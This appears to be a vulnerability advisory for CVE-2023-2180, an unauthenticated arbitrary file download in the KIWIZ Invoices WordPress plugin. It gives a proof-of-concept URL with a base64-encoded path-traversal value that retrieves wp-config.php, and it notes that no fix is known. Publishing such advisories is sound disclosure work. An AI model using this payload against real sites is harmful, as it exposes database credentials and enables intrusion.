KIWIZ Invoices Certification & PDF System <= 2.1.3 – Unauthenticated Arbitrary File Download | CVE 2023-2180 | Plugin Vulnerabilities

Description

The plugin does not validate the path of files to be downloaded, which could allow unauthenticated attacker to read/downlaod arbitrary files, as well as perform PHAR unserialization (assuming they can upload a file on the server)

Proof of Concept

To download ../../../../wp-config.php:

https://example.com/wp-content/plugins/woocommerce-gateway-certification-de-facture-et-gestion-de-pdf-kiwiz/entrypoint/concat-pdf.php?file_name=Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

The downloaded file will have the pdf extension, just change it to php

Affects Plugins

woocommerce-gateway-certification-de-facture-et-gestion-de-pdf-kiwiz

No known fix

References

CVE

Classification

Type

FILE DOWNLOAD

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

4d3b90d8-8a6d-4b72-8bc7-21f861259a1b

Timeline

Publicly Published

2023-04-19 (about 1 years ago)

Added

2023-04-19 (about 1 years ago)

Last Updated

2023-04-19 (about 1 years ago)

Other

Published

Title

Published

2022-08-01

Title

Lana Downloads Manager < 1.8.0 - Contributor+ Arbitrary File Download

Published

2022-11-10

Title

S2W - Import Shopify to WooCommerce < 1.1.13 - Admin+ Arbitrary File Access

Published

2022-12-05

Title

Welcart e-Commerce < 2.8.5 - Subscriber+ Arbitrary File Access

Published

2021-02-13

Title

Theme Editor < 2.6 - Authenticated Arbitrary File Download

Published

2023-07-20

Title

Jupiter X Core <= 2.5.0 - Unauthenticated Arbitrary File Download